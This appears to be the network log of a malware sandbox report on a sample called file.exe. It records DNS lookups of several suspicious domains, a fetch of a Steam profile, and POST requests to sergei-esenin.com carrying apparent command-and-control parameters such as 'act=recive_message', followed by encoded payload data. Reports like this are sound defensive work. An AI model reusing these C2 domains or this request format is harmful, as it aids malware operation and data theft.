                                                                                                                                                                                Oct 20, 2024 08:39:06.493191957 CEST44349734104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:06.493309021 CEST49734443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:06.493689060 CEST49734443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:06.493700027 CEST44349734104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:07.262691021 CEST44349734104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:07.262830019 CEST49734443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:07.264739990 CEST49734443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:07.264750957 CEST44349734104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:07.265039921 CEST44349734104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:07.266602993 CEST49734443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:07.266732931 CEST49734443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:07.266760111 CEST44349734104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:07.881908894 CEST44349734104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:07.882008076 CEST44349734104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:07.882074118 CEST49734443192.168.2.4104.21.53.8
Oct 20, 2024 08:39:07.882416010 CEST | 49734 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:07.882433891 CEST | 443 | 49734 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:08.086041927 CEST | 49735 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:08.086074114 CEST | 443 | 49735 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:08.086157084 CEST | 49735 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:08.086477995 CEST | 49735 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:08.086489916 CEST | 443 | 49735 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:08.953206062 CEST | 443 | 49735 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:08.953301907 CEST | 49735 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:08.954662085 CEST | 49735 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:08.954669952 CEST | 443 | 49735 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:08.954943895 CEST | 443 | 49735 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:08.956228971 CEST | 49735 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:08.956382036 CEST | 49735 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:08.956415892 CEST | 443 | 49735 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:08.956481934 CEST | 49735 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:08.956486940 CEST | 443 | 49735 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:09.769901037 CEST | 443 | 49735 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:09.770025015 CEST | 443 | 49735 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:09.770097017 CEST | 49735 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:09.770112038 CEST | 443 | 49735 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:10.096518040 CEST | 49736 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:10.096616983 CEST | 443 | 49736 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:10.096702099 CEST | 49736 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:10.097058058 CEST | 49736 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:10.097091913 CEST | 443 | 49736 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:10.860639095 CEST | 443 | 49736 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:10.860924006 CEST | 49736 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:10.862164974 CEST | 49736 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:10.862204075 CEST | 443 | 49736 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:10.863068104 CEST | 443 | 49736 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:10.864463091 CEST | 49736 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:10.864567995 CEST | 49736 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:10.864582062 CEST | 443 | 49736 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:11.451075077 CEST | 443 | 49736 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:11.451145887 CEST | 443 | 49736 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:11.451201916 CEST | 49736 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:11.451244116 CEST | 49736 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:11.451267958 CEST | 443 | 49736 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:12.038868904 CEST | 49737 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:12.038979053 CEST | 443 | 49737 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:12.039077044 CEST | 49737 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:12.039447069 CEST | 49737 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:12.039479017 CEST | 443 | 49737 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:12.802630901 CEST | 443 | 49737 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:12.802737951 CEST | 49737 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:12.804218054 CEST | 49737 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:12.804254055 CEST | 443 | 49737 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:12.804594994 CEST | 443 | 49737 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:12.806251049 CEST | 49737 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:12.806988001 CEST | 49737 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:12.807039976 CEST | 443 | 49737 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:12.807214975 CEST | 49737 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:12.807259083 CEST | 443 | 49737 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:12.807420015 CEST | 49737 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:12.807466030 CEST | 443 | 49737 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:12.807642937 CEST | 49737 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:12.807689905 CEST | 443 | 49737 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:12.807890892 CEST | 49737 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:12.807943106 CEST | 443 | 49737 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:12.808180094 CEST | 49737 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:12.808217049 CEST | 443 | 49737 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:12.808238029 CEST | 49737 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:12.808264017 CEST | 443 | 49737 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:12.808480978 CEST | 49737 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:12.808516026 CEST | 443 | 49737 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:12.808603048 CEST | 49737 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:12.808702946 CEST | 49737 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:12.808748960 CEST | 49737 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:12.821393013 CEST | 443 | 49737 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:12.821640968 CEST | 49737 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:12.821707010 CEST | 443 | 49737 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:12.821755886 CEST | 49737 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:12.821867943 CEST | 49737 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:12.824418068 CEST | 443 | 49737 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:16.319320917 CEST | 443 | 49737 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:16.319381952 CEST | 443 | 49737 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:16.319468975 CEST | 49737 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:16.319561005 CEST | 49737 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:16.319605112 CEST | 443 | 49737 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:16.332997084 CEST | 49739 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:16.333051920 CEST | 443 | 49739 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:16.333405972 CEST | 49739 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:16.333751917 CEST | 49739 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:16.333765030 CEST | 443 | 49739 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:17.112648010 CEST | 443 | 49739 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:17.112812042 CEST | 49739 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:17.114758968 CEST | 49739 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:17.114788055 CEST | 443 | 49739 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:17.115041018 CEST | 443 | 49739 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:17.119379997 CEST | 49739 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:17.119445086 CEST | 49739 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:17.119524002 CEST | 443 | 49739 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:17.692681074 CEST | 443 | 49739 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:17.692747116 CEST | 443 | 49739 | 104.21.53.8 | 192.168.2.4
Oct 20, 2024 08:39:17.692827940 CEST | 49739 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:17.692898035 CEST | 49739 | 443 | 192.168.2.4 | 104.21.53.8
Oct 20, 2024 08:39:17.692922115 CEST | 443 | 49739 | 104.21.53.8 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 20, 2024 08:38:59.571722031 CEST | 59915 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 08:38:59.580462933 CEST | 53 | 59915 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 08:38:59.584613085 CEST | 63670 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 08:38:59.599909067 CEST | 53 | 63670 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 08:38:59.602546930 CEST | 55049 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 08:38:59.612046957 CEST | 53 | 55049 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 08:38:59.614173889 CEST | 59702 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 08:38:59.624561071 CEST | 53 | 59702 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 08:38:59.626739979 CEST | 51355 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 08:38:59.635792971 CEST | 53 | 51355 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 08:38:59.636718988 CEST | 49241 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 08:38:59.646498919 CEST | 53 | 49241 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 08:38:59.648118019 CEST | 64120 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 08:38:59.657267094 CEST | 53 | 64120 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 08:38:59.660237074 CEST | 62543 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 08:38:59.669545889 CEST | 53 | 62543 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 08:38:59.671150923 CEST | 60483 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 08:38:59.679637909 CEST | 53 | 60483 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 08:39:01.734764099 CEST | 51651 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 08:39:01.751800060 CEST | 53 | 51651 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 20, 2024 08:38:59.571722031 CEST | 192.168.2.4 | 1.1.1.1 | 0xc985 | Standard query (0) | clearancek.site | A (IP address) | IN (0x0001) | false
Oct 20, 2024 08:38:59.584613085 CEST | 192.168.2.4 | 1.1.1.1 | 0x9da3 | Standard query (0) | mobbipenju.store | A (IP address) | IN (0x0001) | false
Oct 20, 2024 08:38:59.602546930 CEST | 192.168.2.4 | 1.1.1.1 | 0x1009 | Standard query (0) | eaglepawnoy.store | A (IP address) | IN (0x0001) | false
Oct 20, 2024 08:38:59.614173889 CEST | 192.168.2.4 | 1.1.1.1 | 0xaadc | Standard query (0) | dissapoiznw.store | A (IP address) | IN (0x0001) | false
Oct 20, 2024 08:38:59.626739979 CEST | 192.168.2.4 | 1.1.1.1 | 0x565f | Standard query (0) | studennotediw.store | A (IP address) | IN (0x0001) | false
Oct 20, 2024 08:38:59.636718988 CEST | 192.168.2.4 | 1.1.1.1 | 0x119 | Standard query (0) | bathdoomgaz.store | A (IP address) | IN (0x0001) | false
Oct 20, 2024 08:38:59.648118019 CEST | 192.168.2.4 | 1.1.1.1 | 0xdc9b | Standard query (0) | spirittunek.store | A (IP address) | IN (0x0001) | false
Oct 20, 2024 08:38:59.660237074 CEST | 192.168.2.4 | 1.1.1.1 | 0x818d | Standard query (0) | licendfilteo.site | A (IP address) | IN (0x0001) | false
Oct 20, 2024 08:38:59.671150923 CEST | 192.168.2.4 | 1.1.1.1 | 0x9f25 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Oct 20, 2024 08:39:01.734764099 CEST | 192.168.2.4 | 1.1.1.1 | 0x4186 | Standard query (0) | sergei-esenin.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 20, 2024 08:38:59.580462933 CEST | 1.1.1.1 | 192.168.2.4 | 0xc985 | Name error (3) | clearancek.site | none | none | A (IP address) | IN (0x0001) | false
Oct 20, 2024 08:38:59.599909067 CEST | 1.1.1.1 | 192.168.2.4 | 0x9da3 | Name error (3) | mobbipenju.store | none | none | A (IP address) | IN (0x0001) | false
Oct 20, 2024 08:38:59.612046957 CEST | 1.1.1.1 | 192.168.2.4 | 0x1009 | Name error (3) | eaglepawnoy.store | none | none | A (IP address) | IN (0x0001) | false
Oct 20, 2024 08:38:59.624561071 CEST | 1.1.1.1 | 192.168.2.4 | 0xaadc | Name error (3) | dissapoiznw.store | none | none | A (IP address) | IN (0x0001) | false
Oct 20, 2024 08:38:59.635792971 CEST | 1.1.1.1 | 192.168.2.4 | 0x565f | Name error (3) | studennotediw.store | none | none | A (IP address) | IN (0x0001) | false
Oct 20, 2024 08:38:59.646498919 CEST | 1.1.1.1 | 192.168.2.4 | 0x119 | Name error (3) | bathdoomgaz.store | none | none | A (IP address) | IN (0x0001) | false
Oct 20, 2024 08:38:59.657267094 CEST | 1.1.1.1 | 192.168.2.4 | 0xdc9b | Name error (3) | spirittunek.store | none | none | A (IP address) | IN (0x0001) | false
Oct 20, 2024 08:38:59.669545889 CEST | 1.1.1.1 | 192.168.2.4 | 0x818d | Name error (3) | licendfilteo.site | none | none | A (IP address) | IN (0x0001) | false
Oct 20, 2024 08:38:59.679637909 CEST | 1.1.1.1 | 192.168.2.4 | 0x9f25 | No error (0) | steamcommunity.com | | 104.102.49.254 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 08:39:01.751800060 CEST | 1.1.1.1 | 192.168.2.4 | 0x4186 | No error (0) | sergei-esenin.com | | 104.21.53.8 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 08:39:01.751800060 CEST | 1.1.1.1 | 192.168.2.4 | 0x4186 | No error (0) | sergei-esenin.com | | 172.67.206.204 | A (IP address) | IN (0x0001) | false
• steamcommunity.com
• sergei-esenin.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 104.102.49.254 | 443 | 7436 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-20 06:39:00 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com
2024-10-20 06:39:01 UTC | 1891 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://ste [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Sun, 20 Oct 2024 06:39:01 GMT
Content-Length: 34508
Connection: close
Set-Cookie: sessionid=af6637e6d5cd8f076664704a; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C0e3d185a3e106e73b244decdec33a0ea; Path=/; Secure; HttpOnly; SameSite=None
2024-10-20 06:39:01 UTC | 14493 | IN | Data Raw: (hex dump omitted)
Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-20 06:39:01 UTC | 16384 | IN | Data Raw: (hex dump omitted)
Data Ascii: etY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu" aria-label="Account Me


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 104.21.53.8 | 443 | 7436 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-20 06:39:02 UTC | 264 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: sergei-esenin.com
2024-10-20 06:39:02 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-10-20 06:39:02 UTC | 558 | IN | HTTP/1.1 403 Forbidden
Date: Sun, 20 Oct 2024 06:39:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JuaMAjSNvLuGswKX4gwL3ISsU7GnOoH0MZusFU17FC9mbzufQz1G7FfB2N7Y92jiEyom3BtaFgA8Z0QU%2F39MyShlH%2F08IL7HYshTvlUjz98zeevg4wkRztf3156isbPjuHmEgA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d5702296a0b535b-LAX
2024-10-20 06:39:02 UTC | 811 | IN | Data Raw: (hex dump omitted)
Data Ascii: 1153<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-10-20 06:39:02 UTC | 1369 | IN | Data Raw: (hex dump omitted)
Data Ascii: styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementByI
2024-10-20 06:39:02 UTC | 1369 | IN | Data Raw: (hex dump omitted)
Data Ascii: management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain">
2024-10-20 06:39:02 UTC | 894 | IN | Data Raw: (hex dump omitted)
Data Ascii: pan> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing"
2024-10-20 06:39:02 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49732 | 104.21.53.8 | 443 | 7436 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-20 06:39:03 UTC | 354 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Cookie: __cf_mw_byp=bKmBZVeXetEUsJEvqQWppTmgKdLdaxlDFkrWihgCGmQ-1729406342-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 52
Host: sergei-esenin.com
2024-10-20 06:39:03 UTC | 52 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
2024-10-20 06:39:04 UTC | 1016 | IN | HTTP/1.1 200 OK
Date: Sun, 20 Oct 2024 06:39:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=af5ga2uj1ikinr5pvfcsapd2u5; expires=Thu, 13 Feb 2025 00:25:43 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OYLP4rLCId8IPPjoehxePUhj0p528CeCBNoXajW3QQ4pZ2ycy0ItoSj1Tah3Wf3D%2FNunh0tsAsvhc97s2pQ%2FL1gUldJjRPUEWblhbWZK79kSLTtPx9N0jnt7HiW%2BvAe4Hd1wqg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d570230f990101b-LAX
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1557&sent=4&recv=5&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1042&delivery_rate=1885416&cwnd=187&unsent_bytes=0&cid=73d3839ef3c74bae&ts=804&x=0"
2024-10-20 06:39:04 UTC | 353 | IN | Data Raw: (hex dump omitted)
Data Ascii: (base64-like payload omitted)
2024-10-20 06:39:04 UTC | 1369 | IN | Data Raw: (hex dump omitted)
Data Ascii: (base64-like payload omitted)
2024-10-20 06:39:04 UTC | 1369 | IN | Data Raw: (hex dump omitted)
Data Ascii: (base64-like payload omitted)
2024-10-20 06:39:04 UTC | 199 | IN | Data Raw: (hex dump omitted)
Data Ascii: (base64-like payload omitted)
2024-10-20 06:39:04 UTC | 1369 | IN | Data Raw: (hex dump omitted)
Data Ascii: (base64-like payload omitted)
2024-10-20 06:39:04 UTC | 1369 | IN | Data Raw: (hex dump omitted)
                                                                                                                                                                                Data Ascii: MgtFEyBiF32Tb31HotBVaNm5snyBYzah3O4MUFDl5i1zf3CnMvJHXYf+Cfb2YMXN/F1CbGHTBpEs/twAtcGSfeL7NZPAo3ZtUt+dV+JQZdkZ6QboVVPXVVmqr0D0ALLdc+vRIsQiol0jO/iTYiBUKUnJ8lxRI1aB/C5cIBQBsj0ye6Xz0GOmzSM/vWNmhLV4fdzG7gNBdBEtiq2UxXUCXcb+8SPwU/b9449d9/KABCjZ6QLcIWPWQbwu3DDEkRK
                                                                                                                                                                                2024-10-20 06:39:04 UTC1369INData Raw: 53 48 67 41 30 54 4e 49 6b 76 38 34 34 50 30 74 58 6b 39 33 4d 62 73 6f 65 4d 47 49 59 77 65 7a 46 43 55 73 61 49 39 63 6e 75 6b 41 77 41 7a 78 68 31 54 44 35 31 33 63 70 44 56 65 57 6e 4a 77 70 69 31 74 36 61 67 32 43 73 6f 59 73 53 52 4d 6d 6b 44 44 35 53 33 4d 4c 50 79 57 4e 66 2f 2f 62 66 43 77 46 55 4a 69 50 6b 69 66 4c 46 69 68 75 45 38 72 73 79 67 35 44 47 43 76 51 4b 72 78 66 4f 41 45 31 5a 64 34 2b 76 35 38 32 49 52 4d 51 78 39 32 6c 49 38 55 52 4e 47 34 46 78 61 72 5a 54 46 64 51 4a 64 78 76 37 78 49 38 42 53 46 69 30 44 66 32 30 58 67 76 41 6c 65 62 6e 70 55 71 78 78 6f 7a 62 68 33 44 34 73 6b 42 54 68 73 71 32 69 36 35 56 33 4e 43 63 32 4c 4e 66 36 65 52 57 53 55 4f 57 35 37 66 73 79 6a 4d 47 58 70 79 57 39 75 71 77 51 34 4f 53 47 4c 54 4b 37
                                                                                                                                                                                Data Ascii: SHgA0TNIkv844P0tXk93MbsoeMGIYwezFCUsaI9cnukAwAzxh1TD513cpDVeWnJwpi1t6ag2CsoYsSRMmkDD5S3MLPyWNf//bfCwFUJiPkifLFihuE8rsyg5DGCvQKrxfOAE1Zd4+v582IRMQx92lI8URNG4FxarZTFdQJdxv7xI8BSFi0Df20XgvAlebnpUqxxozbh3D4skBThsq2i65V3NCc2LNf6eRWSUOW57fsyjMGXpyW9uqwQ4OSGLTK7
                                                                                                                                                                                2024-10-20 06:39:04 UTC1369INData Raw: 50 6d 50 43 4c 72 2b 66 4e 69 42 4c 43 4d 2f 54 31 43 72 61 56 57 49 39 52 35 6d 2f 6c 56 55 65 51 6a 32 65 4e 76 64 45 63 31 52 68 4b 35 55 74 76 34 6b 32 59 51 68 43 6a 5a 75 58 4f 4d 68 53 42 46 4d 37 78 65 7a 44 42 56 35 53 44 4e 73 37 73 42 4a 39 54 44 77 6c 6a 51 61 2f 6d 54 59 5a 52 52 43 48 33 63 78 75 2f 68 59 30 59 78 4c 55 2b 34 73 73 53 52 59 6e 31 7a 2f 31 66 44 67 59 4e 43 57 62 66 2f 6d 52 4c 6e 5a 46 45 4a 75 4d 31 48 61 62 52 32 45 34 52 70 57 36 6c 42 30 41 43 57 4c 47 62 2b 38 41 66 55 77 68 4a 59 31 2f 75 4e 4a 6b 4e 41 31 54 69 5a 37 54 45 50 55 57 4c 47 41 61 79 65 76 34 50 47 41 64 49 39 4d 68 39 57 4d 6c 41 53 4e 6d 30 44 6a 42 37 33 67 68 48 31 65 52 6d 35 52 75 68 56 55 31 4c 55 33 37 71 6f 35 43 63 56 35 69 79 47 2f 76 45 67 59
